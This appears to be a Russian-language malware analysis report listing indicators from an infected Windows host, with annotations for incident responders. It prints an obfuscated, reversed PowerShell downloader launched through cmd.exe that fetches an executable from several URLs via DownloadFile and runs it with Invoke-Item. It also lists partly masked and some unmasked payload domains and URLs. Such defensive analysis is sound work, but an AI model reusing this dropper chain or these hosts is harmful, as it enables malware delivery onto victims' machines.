Техническая информация
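- '<SYSTEM32>\cmd.exe' /V:/C"set qyle=;'LZB'=DmQ$}}{hctac}};kaerb;'WNi'=jXd$;lVw$ metI-ekovnI{ )00008 eg- htgnel.)lVw$ metI-teG(( fI;'lWc'=jkE$;)lVw$ ,siw$(eliFdaolnwoD.Rwr${yrt{)OZb$ ni siw$(hcaerof;'exe.'+CDR$+'\'+...
  (Примечание: значение переменной qyle — это код PowerShell, записанный задом наперёд. При чтении справа налево видны перебор адресов из $bZO, вызов $rwR.DownloadFile, проверка, что размер загруженного файла не меньше 80000 байт, и запуск файла через Invoke-Item. Строка в отчёте обрезана, поэтому остальная часть команды здесь не видна.)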
- 'tr####hilders.com':80
- 'th###wans.com':80
- 'su####ardoso.com.br':80
- 'st###-castle.ir':80
- 'st###-castle.ir':443
- http://tr####hilders.com/G
- http://th###wans.com/3Pr2Hp
- http://st###-castle.ir/8WzsCrw
- 'st###-castle.ir':443
- DNS ASK tr####hilders.com
- DNS ASK th###wans.com
- DNS ASK st###tmeharg.ie
- DNS ASK su####ardoso.com.br
- DNS ASK st###-castle.ir
- '<SYSTEM32>\cmd.exe' /V:/C"set qyle=;'LZB'=DmQ$}}{hctac}};kaerb;'WNi'=jXd$;lVw$ metI-ekovnI{ )00008 eg- htgnel.)lVw$ metI-teG(( fI;'lWc'=jkE$;)lVw$ ,siw$(eliFdaolnwoD.Rwr${yrt{)OZb$ ni siw$(hcaerof;'exe.'+CDR$+'\'+...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $mKD='uFj';$rwR=new-object Net.WebClient;$bZO='http://tr####hilders.com/G@http://thedewans.com/3Pr2Hp@http://stuartmeharg.ie/n@http://supercardoso.com.br/aOHFp@http://...
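- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
  (Примечание: аргумент «-», по-видимому, означает, что сценарий передаётся процессу через стандартный ввод — ср. «echo powershell …» в предыдущей записи. В командной строке этого процесса самого сценария нет, поэтому при разборе инцидента стоит опираться на цепочку родительских процессов cmd.exe и на журналирование блоков сценариев PowerShell.)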
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =uFj